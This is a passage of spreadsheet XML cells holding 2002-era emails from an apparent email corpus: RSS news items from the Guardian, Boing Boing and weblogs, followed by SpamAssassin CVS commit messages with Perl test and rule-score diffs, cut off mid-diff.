    <t>URL: [URL]http://www.newsisfree.com[/URL],8456087,215/\nDate: 2002-10-02T03:56:58+01:00\n\n*World latest:* Leading Republicans side with the Democrats over the \npresident's war powers.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:02:45 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:02:45 -0000</t>
  </si>
  <si>
    <t>The subtle art of sugaring bitter pills goes down well</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8456085,215/\nDate: 2002-10-02T03:57:00+01:00\n\n*Politics:* For the Labour leader in trouble there are usually two ways out. \nFaced with a restless party, you can either cave in or stand firm, writes *\nJonathan Freedland*.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:02:42 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:02:42 -0000</t>
  </si>
  <si>
    <t>The Blair message: be bold</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8456083,215/\nDate: 2002-10-02T03:57:02+01:00\n\nTime to transform post-war 'one size fits all' public services, urges PM.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:02:06 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:02:06 -0000</t>
  </si>
  <si>
    <t>US rejects Iraq inspections deal</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8457381,215/\nDate: 2002-10-02T04:58:04+01:00\n\nThe US has rejected an agreement between Iraq and the United Nations on arms \ninspections, vowing to block the inspectors' return unless they are backed with \nthreats of military force.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:01:32 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:01:32 -0000</t>
  </si>
  <si>
    <t>Danger Hiptop reviewed</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nThe T-Mobile Sidekick -- the first commercial implementation of the wonderful \nDanger Hiptop PDA/phone -- is now onsale and the reviews are starting to \nappear. As soon as I'm in San Francisco for more than a couple days straight, I \nreally think I'm going to pick this up. \n\n    That's partly because it costs less than half as much as its current \n    competitors -- $199, compared with $450 and up for the others. In the same \n    spirit, T-Mobile will offer unlimited data usage on its new, relatively \n    high- speed "GPRS" network for $40 per month -- far below what a serious \n    surfer would likely rack up under competing wireless-data plans. (Voice \n    time is another story -- more on that later.) \n\n    Another reason I like the Sidekick's prospects: It was designed for, and \n    will be pitched to, a very different market. While vendors of the competing \n    hybrids focus on "enterprise" customers -- the big businesses that are \n    supposed to have deep pockets for this sort of thing (even though most \n    clearly don't at this point) -- Danger and T-Mobile are targeting, in their \n    own words, "Internet-savvy, primarily urban, young adults in the 18- to \n    34-year-old demographic." \n\nI am that demographic! Link[1] Discuss[2] (_Thanks, Steve[3]!_)\n\n[1] [URL]http://www.sfgate.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.portigal.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.sfgate.com http://www.quicktopic.com http://www.portigal.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:01:30 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:01:30 -0000</t>
  </si>
  <si>
    <t>TrackBack for OSXCON</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nMena sez: "We've set up a TrackBack ping repository for attendees of O'Reilly's \nMac OS X Conference. If you're using Movable Type or a TrackBack-enabled tool, \nyou can ping the category relating to your OSXCon-specific weblog post." Link\n[1] Discuss[2] (_Thanks, Mena[3]!_)\n\n[1] [URL]http://www.movabletype.org[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.dollarshort.org[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.movabletype.org http://www.quicktopic.com http://www.dollarshort.org</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:01:20 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:01:20 -0000</t>
  </si>
  <si>
    <t>Distributed.net cracks the RC5-64 cipher</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nThe Distributed.net project -- a precursor to SETI@Home that used volunteer \ncomputer-time to attack giant, sophisticated ciphers -- has cracked RC564. I \nused to have half a dozen computers working on this. \n\n    On 14-Jul-2002, a relatively characterless PIII-450 in Tokyo returned the \n    winning key to the distributed.net keyservers. The key 0x63DE7DC154F4D039 \n    produces the plaintext output: \n\n    The unknown message is: some things are better left unread \n\n    Unfortunately, due to breakage in scripts (dbaker's fault, naturally) on \n    the keymaster, this successful submission was not automatically detected. \n    It sat undiscovered until 12-Aug-2002. The key was immediately submitted to \n    RSA Labs and was verified as the winning key.  \n\nLink[1] Discuss[2] (_Thanks, Dave[3]!_)\n\n[1] [URL]http://www.distributed.net[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.seizethedave.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.distributed.net http://www.quicktopic.com http://www.seizethedave.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:01:11 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:01:11 -0000</t>
  </si>
  <si>
    <t>Big Five record companies guilty of price fixing</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nHypocrites in the recording industry have been screaming about people stealing \nmusic. All the while, they've been robbing CD buyers. \n\n    ...five of the largest U.S. distributors of pre-recorded music CDs and \n    three large retailers agreed to pay millions of dollars in cash and free \n    CDs as part of an agreement on price-fixing allegations.  \n\nLink[1] Discuss[2]\n\n[1] [URL]http://blogcritics.org[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://blogcritics.org http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:01:09 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:01:09 -0000</t>
  </si>
  <si>
    <t>Kevin Mitnick's laptop, signed by Woz, on eBay</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nKevin "Free Kevin" Mitnick and Steve "Woz" Wozniak co-hosted an episode of The \nScreen Saver on Tech TV, where Woz autographed one of the laptops that Kevin \ngot arrested for using. Now that machine, signed by both net-celebs, is up for \nsale on eBay. \n\n    This is the Toshiba Satellite T1960CS, 486 laptop computer seized by the \n    FBI on February 15, 1995, in Raleigh, NC, during the arrest of the world's \n    most celebrated computer hacker, Kevin Mitnick. The laptop is working and \n    has been loaded with a fresh version of Windows 95. A shrink-wrapped \n    version of Windows 95 on floppy, is included with the laptop. The laptop is \n    a 486DX with a color LCD, detachable trackball mouse, AT&amp;T 14.4 PCMCIA \n    modem card, power adapter and documentation in FBI evidence bags. The \n    laptop has been signed on the bottom by Steve Wozniak, co-founder of Apple \n    Computer, and says, "You've got the whole world in your hands. --Woz (Free \n    Kevin!). It is also signed by Mitnick himself. The system was shown on the \n    September 27, 2002 episode of The Screen Savers on TechTV, where the \n    signatures on the bottom were authenticated in a special show hosted by \n    Wozniak and Mitnick. A tape of the show will also be included.  \n\nLink[1] Discuss[2] (_Thanks, Jimbo!_)\n\n[1] [URL]http://cgi.ebay.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://cgi.ebay.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:01:08 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:01:08 -0000</t>
  </si>
  <si>
    <t>Record industry defends practices to Senate</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nThe Joint Hearing of the Senate Committee and Senate Select Committee on the \nEntertainment Industry is underway in LA, investigating artists' claims that \nthe labels engage in unfair and corrupt business-practices. The first day's \nfindings at the hearings are really quite remarkable: \n\n    By contract, artists are prohibited from showing royalty statements to \n    third parties. Normally this would not include their mangers, lawyers, \n    consultants, or others who could aid them in getting paid, but apparently \n    this is not necessarily the case. Senator Kevin Murray, leading the \n    initiative for artists' rights, claimed the that Cary Sherman, Chief \n    Counsel for the RIAA himself, said to him in an interview, that RIAA \n    members (the major labels) would sue any artist that broke ranks and shared \n    information with the Committee. This claim was rejected by Sherman but \n    supported by others in the room. Don Henley, among them, outwardly dared \n    his record company to sue him for bringing royalty statements to the \n    hearing. He presented his most recent royalty statement for "Hell Freezes \n    Over," which showed the panel that even though his contract called for a no \n    more than a 10% "reserve" on sales of records shipped, Universal Music had \n    held back more than that for eleven pay periods (roughly under three years) \n    and that, even though his contract calls for no free goods in Europe, they \n    had deducted $87,000 in free goods charges to Europe.  \n\nLink[1] Discuss[2] (_Thanks, Paul!_)\n\n[1] [URL]http://www.musicdish.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.musicdish.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:01:07 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:01:07 -0000</t>
  </si>
  <si>
    <t>If it's too loud, you're too French</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nThe French and the iPod aren't getting along -- the iPod outputs more decibels \nthrough its headphones than are legal in La Belle France. Link[1] Discuss[2] (_\nThanks, Ernie[3]!_)\n\n[1] [URL]http://translate.google.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.psylux.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://translate.google.com http://www.quicktopic.com http://www.psylux.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:01:05 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:01:05 -0000</t>
  </si>
  <si>
    <t>Bloodhag interviewed</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nThe new ish of Strange Horizons in out, with an interview with Bloodhag, the \nmost metal of the all the science fiction metal bands. \n\n    Soon, the spotlight comes up again. The lead singer grabs the microphone. \n    "This is Frank Bellknap Long!" he yells, and, feverish, launches into a \n    lecture on Long's oeuvre. There can't be more than a handful of people on \n    this earth who could get a beer-sodden thrash crowd to listen to an English \n    Lit lecture. Thirty seconds later, the audience is sufficiently educated, \n    and the guys begin to wail. Jake the singer holds the microphone over his \n    head and belts out the song in a growling voice that's monster-movie low. \n    "No reason! No corners!" he shouts. Two minutes later, they're done with \n    the pulps and ready to move on to the New Wave. "Our next song is about \n    Harlan Ellison!" Jake bellows, and the geeks, the hipsters, the metalheads, \n    and the drunks let out a howl of mutual joy. \n\n    Bldhag -- note the dual umlauts -- hails from Seattle. Describing \n    themselves as "edu-core," the band performs nothing but two-minute thrash \n    tributes to science fiction writers. Between songs, the band pelts the \n    audience with paperback books, quizzes them on book titles, and demands \n    that the audience show their library cards. Their motto: "The Faster You Go \n    Deaf, the More Time You Have to Read."  \n\nLink[1] Discuss[2] (_Thanks, Zed[3]!_)\n\n[1] [URL]http://www.strangehorizons.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.mememachinego.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.strangehorizons.com http://www.quicktopic.com http://www.mememachinego.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:00:57 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:00:57 -0000</t>
  </si>
  <si>
    <t>International agreements</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nEli the Bearded sez: \n\n    Ever wanted to see an international agreement? There are an awful lot of \n    them here, and the ones I looked at were surprizingly readable. I was \n    looking for the Balfour Declaration, the thing I saw cited as the start of \n    Israel recently. Suprizingly this document is only four paragraphs. The \n    Oslo Accords (Israel/PLO agreement of 1993) is another thing much shorter \n    than I had imagined.  \n\nLink[1] Discuss[2] (_Thanks, Eli!_)\n\n[1] [URL]http://www.yale.edu[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.yale.edu http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:00:54 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:00:54 -0000</t>
  </si>
  <si>
    <t>Clarion comes to Australia!</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nThe legendary Clarion Writers' Workshop -- of which I am an alumnus, class of \n'92 -- has spun out another satellite branch (Clarion West, in Seattle, has \nbeen going for some years now). The new workshop, Clarion South, will be held \nin Queensland, Australia, in 2004, so that antipodeans can also attend \nscience-fiction bootcamp without travelling to America. Link[1] Discuss[2] (_\nThanks, Pat!_)\n\n[1] [URL]http://www.clarionsouth.org[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.clarionsouth.org http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: aaronsw &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:00:28 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:00:28 -0000</t>
  </si>
  <si>
    <t>quick hack</t>
  </si>
  <si>
    <t>URL: [URL]http://www.aaronsw.com[/URL]\nDate: 2002-10-01T22:36:19-06:00\n\nNew York Times as a Weblog[1] (source code[2]) Comments appreciated. Yes, I \nknow UserLand had something like this[3] but as you can see it doesn't seem to \nbe working anymore. \n\n\n\n[1] [URL]http://nytimes.blogspace.com[/URL]\n[2] [URL]http://nytimes.blogspace.com[/URL]\n[3] [URL]http://radio.weblogs.com[/URL]</t>
  </si>
  <si>
    <t>http://www.aaronsw.com http://nytimes.blogspace.com http://nytimes.blogspace.com http://radio.weblogs.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: aaronsw &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:00:26 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:00:26 -0000</t>
  </si>
  <si>
    <t>never a cent</t>
  </si>
  <si>
    <t>URL: [URL]http://www.aaronsw.com[/URL]\nDate: 2002-10-01T22:54:21-06:00\n\nMusicDish: First Blood is Spilled[1]. "Back Street Boy Kevin Richardson [] \ntestified that they have NEVER received a royalty check" So much for "we're \njust trying to protect the artists", eh? \n\nWow. The Backstreet Boys! I mean, Janis Ian was easy to dismiss but this is a \nwhole 'nother ballgame. Wow.\n\n\n\n[1] [URL]http://www.musicdish.com[/URL]</t>
  </si>
  <si>
    <t>http://www.aaronsw.com http://www.musicdish.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:00:24 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:00:24 -0000</t>
  </si>
  <si>
    <t>There are four lights</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-01T12:53:57-05:00\n\nOne year ago today, my (now former) manager told me to shut down my weblog and \nremove all traces of it from my server. He tried to convince me that the \nInternet was too small to mix the professional[1] and the personal[2]. \n\nOne year ago today, I gave him my answer[3], and the rest is history[4]. \n\nToday, to celebrate this anniversary, I would like everyone to read my resume\n[5], admire this full-screen picture of my cat[6], and link to this post[7]. \n\nThere are four lights.\n\n\n\n[1] [URL]http://diveintopython.org[/URL]\n    Dive Into Python\n[2] [URL]http://diveintomark.org[/URL]\n    dive into mark 9/22/2001: \n[3] [URL]http://diveintomark.org[/URL]\n    dive into mark 10/1/2001: \n[4] [URL]http://diveintomark.org[/URL]\n    dive into mark October 2001 archives\n[5] [URL]http://diveintomark.org[/URL]\n    my resume in HTML format\n[6] [URL]http://diveintomark.org[/URL]\n    J, 1024 x 768\n[7] [URL]http://diveintomark.org[/URL]\n    permanent link to this post</t>
  </si>
  <si>
    <t>http://diveintomark.org http://diveintopython.org http://diveintomark.org http://diveintomark.org http://diveintomark.org http://diveintomark.org http://diveintomark.org http://diveintomark.org</t>
  </si>
  <si>
    <t>To: spamassassin-commits@example.sourceforge.net\nFrom: Justin Mason &lt;yyyyason@users.sourceforge.net&gt;\nDate: Wed, 02 Oct 2002 06:20:35 -0700</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 06:20:35 -0700</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin/t db_based_whitelist.t,1.7,1.8</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin/t In directory usw-pr-cvs1:/tmp/cvs-serv4429/t Modified Files: 	db_based_whitelist.t db_based_whitelist_ips.t  Log Message: fixed bug 1033: -R and -W were not respecting auto_whitelist_path Index: db_based_whitelist.t =================================================================== RCS file: /cvsroot/spamassassin/spamassassin/t/db_based_whitelist.t,v retrieving revision 1.7 retrieving revision 1.8 diff -b -w -u -d -r1.7 -r1.8 --- db_based_whitelist.t	26 Sep 2002 17:15:04 -0000	1.7 +++ db_based_whitelist.t	2 Oct 2002 13:20:33 -0000	1.8 @@ -2,7 +2,7 @@    use lib '.'; use lib 't';  use SATest; sa_t_init("db_based_whitelist"); -use Test; BEGIN { plan tests =&gt; 3 }; +use Test; BEGIN { plan tests =&gt; 8 };    # ---------------------------------------------------------------------------   @@ -16,17 +16,17 @@  %patterns = %is_nonspam_patterns;  $scr_test_args = "-M Mail::SpamAssassin::DBBasedAddrList";   -sarun ("--remove-addr-from-whitelist whitelist_test\@whitelist.spamassassin.taint.org", \&amp;patterns_run_cb); +ok (sarun ("--remove-addr-from-whitelist whitelist_test\@whitelist.spamassassin.taint.org", \&amp;patterns_run_cb));    # 3 times, to get into the whitelist: -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb); -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb); -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb); +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb)); +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb)); +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));    # Now check  ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));  ok_all_patterns();    %patterns = %is_spam_patterns; -sarun ("-L -a -t &lt; data/spam/004", \&amp;patterns_run_cb); +ok (sarun ("-L -a -t &lt; data/spam/004", \&amp;patterns_run_cb));  ok_all_patterns(); Index: db_based_whitelist_ips.t =================================================================== RCS file: /cvsroot/spamassassin/spamassassin/t/db_based_whitelist_ips.t,v retrieving revision 1.2 retrieving revision 1.3 diff -b -w -u -d -r1.2 -r1.3 --- db_based_whitelist_ips.t	26 Sep 2002 17:15:04 -0000	1.2 +++ db_based_whitelist_ips.t	2 Oct 2002 13:20:33 -0000	1.3 @@ -2,7 +2,7 @@    use lib '.'; use lib 't';  use SATest; sa_t_init("db_based_whitelist_ips"); -use Test; BEGIN { plan tests =&gt; 3 }; +use Test; BEGIN { plan tests =&gt; 8 };    # ---------------------------------------------------------------------------   @@ -15,18 +15,18 @@    %patterns = %is_nonspam_patterns;   -sarun ("--remove-addr-from-whitelist whitelist_test\@whitelist.spamassassin.taint.org", \&amp;patterns_run_cb); +ok (sarun ("--remove-addr-from-whitelist whitelist_test\@whitelist.spamassassin.taint.org", \&amp;patterns_run_cb));    # 3 times, to get into the whitelist: -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb); -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb); -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb); +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb)); +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb)); +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));    # Now check  ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));  ok_all_patterns();    %patterns = %is_spam_patterns; -sarun ("-L -a -t &lt; data/spam/007", \&amp;patterns_run_cb); +ok (sarun ("-L -a -t &lt; data/spam/007", \&amp;patterns_run_cb));  ok_all_patterns();   ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-commits mailing list Spamassassin-commits@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin/rules 50_scores.cf,1.226,1.227</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin/rules\nIn directory usw-pr-cvs1:/tmp/cvs-serv4429/rules\n\nModified Files:\n	50_scores.cf 60_whitelist.cf \nLog Message:\nfixed bug 1033: -R and -W were not respecting auto_whitelist_path\n\nIndex: 50_scores.cf\n===================================================================\nRCS file: /cvsroot/spamassassin/spamassassin/rules/50_scores.cf,v\nretrieving revision 1.226\nretrieving revision 1.227\ndiff -b -w -u -d -r1.226 -r1.227\n--- 50_scores.cf	1 Oct 2002 09:53:43 -0000	1.226\n+++ 50_scores.cf	2 Oct 2002 13:20:32 -0000	1.227\n@@ -611,7 +611,7 @@\n score PORN_GALLERIES                 1.000\n score RATWARE_LC_OUTLOOK             1.000\n score SHORT_RECEIVED_LINE            4.300\n-score SAFEGUARD_NOTICE               -3.300\n+score SAFEGUARD_NOTICE               3.300\n score MAILMAN_CONFIRM                -1.000\n score SIGNIFICANT                    1.000\n score RATWARE_DIFFOND                2.200\n\nIndex: 60_whitelist.cf\n===================================================================\nRCS file: /cvsroot/spamassassin/spamassassin/rules/60_whitelist.cf,v\nretrieving revision 1.31\nretrieving revision 1.32\ndiff -b -w -u -d -r1.31 -r1.32\n--- 60_whitelist.cf	11 Sep 2002 21:31:35 -0000	1.31\n+++ 60_whitelist.cf	2 Oct 2002 13:20:33 -0000	1.32\n@@ -65,3 +65,4 @@\n \n # Friends re-united (popular UK old-school-network)\n whitelist_from_rcvd *@friendsreunited.co.uk                 friendsreunited.co.uk\n+\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-commits mailing list\nSpamassassin-commits@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-commits@example.sourceforge.net\nFrom: Justin Mason &lt;yyyyason@users.sourceforge.net&gt;\nDate: Wed, 02 Oct 2002 06:20:34 -0700</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 06:20:34 -0700</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin spamassassin.raw,1.76,1.77</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin\nIn directory usw-pr-cvs1:/tmp/cvs-serv4429\n\nModified Files:\n	spamassassin.raw \nLog Message:\nfixed bug 1033: -R and -W were not respecting auto_whitelist_path\n\nIndex: spamassassin.raw\n===================================================================\nRCS file: /cvsroot/spamassassin/spamassassin/spamassassin.raw,v\nretrieving revision 1.76\nretrieving revision 1.77\ndiff -b -w -u -d -r1.76 -r1.77\n--- spamassassin.raw	26 Sep 2002 17:14:59 -0000	1.76\n+++ spamassassin.raw	2 Oct 2002 13:20:32 -0000	1.77\n@@ -218,6 +218,9 @@\n   if ($@) { warn $@; }\n \n   if ($doing_whitelist_operation) {\n+    # read the config!\n+    $spamtest-&gt;init (1);\n+\n     if ($opt{'add-to-whitelist'}) {\n       $spamtest-&gt;add_all_addresses_to_whitelist ($mail);\n     } elsif ($opt{'remove-from-whitelist'}) {\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-commits mailing list\nSpamassassin-commits@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-commits@example.sourceforge.net\nFrom: Justin Mason &lt;yyyyason@users.sourceforge.net&gt;\nDate: Wed, 02 Oct 2002 06:19:31 -0700</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 06:19:31 -0700</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin/t db_based_whitelist.t,1.6.4.1,1.6.4.2</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin/t In directory usw-pr-cvs1:/tmp/cvs-serv4019/t Modified Files:       Tag: b2_4_0 	db_based_whitelist.t db_based_whitelist_ips.t  Log Message: fixed bug 1033: -R and -W were not respecting auto_whitelist_path Index: db_based_whitelist.t =================================================================== RCS file: /cvsroot/spamassassin/spamassassin/t/db_based_whitelist.t,v retrieving revision 1.6.4.1 retrieving revision 1.6.4.2 diff -b -w -u -d -r1.6.4.1 -r1.6.4.2 --- db_based_whitelist.t	24 Sep 2002 18:51:38 -0000	1.6.4.1 +++ db_based_whitelist.t	2 Oct 2002 13:19:28 -0000	1.6.4.2 @@ -2,7 +2,7 @@    use lib '.'; use lib 't';  use SATest; sa_t_init("db_based_whitelist"); -use Test; BEGIN { plan tests =&gt; 3 }; +use Test; BEGIN { plan tests =&gt; 8 };    # ---------------------------------------------------------------------------   @@ -16,17 +16,17 @@  %patterns = %is_nonspam_patterns;  $scr_test_args = "-M Mail::SpamAssassin::DBBasedAddrList";   -sarun ("--remove-addr-from-whitelist whitelist_test\@whitelist.spamassassin.taint.org", \&amp;patterns_run_cb); +ok (sarun ("--remove-addr-from-whitelist whitelist_test\@whitelist.spamassassin.taint.org", \&amp;patterns_run_cb));    # 3 times, to get into the whitelist: -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb); -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb); -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb); +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb)); +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb)); +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));    # Now check  ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));  ok_all_patterns();    %patterns = %is_spam_patterns; -sarun ("-L -a -t &lt; data/spam/004", \&amp;patterns_run_cb); +ok (sarun ("-L -a -t &lt; data/spam/004", \&amp;patterns_run_cb));  ok_all_patterns(); Index: db_based_whitelist_ips.t =================================================================== RCS file: /cvsroot/spamassassin/spamassassin/t/db_based_whitelist_ips.t,v retrieving revision 1.1.2.1 retrieving revision 1.1.2.2 diff -b -w -u -d -r1.1.2.1 -r1.1.2.2 --- db_based_whitelist_ips.t	24 Sep 2002 18:51:38 -0000	1.1.2.1 +++ db_based_whitelist_ips.t	2 Oct 2002 13:19:29 -0000	1.1.2.2 @@ -2,7 +2,7 @@    use lib '.'; use lib 't';  use SATest; sa_t_init("db_based_whitelist_ips"); -use Test; BEGIN { plan tests =&gt; 3 }; +use Test; BEGIN { plan tests =&gt; 8 };    # ---------------------------------------------------------------------------   @@ -15,18 +15,18 @@    %patterns = %is_nonspam_patterns;   -sarun ("--remove-addr-from-whitelist whitelist_test\@whitelist.spamassassin.taint.org", \&amp;patterns_run_cb); +ok (sarun ("--remove-addr-from-whitelist whitelist_test\@whitelist.spamassassin.taint.org", \&amp;patterns_run_cb));    # 3 times, to get into the whitelist: -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb); -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb); -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb); +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb)); +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb)); 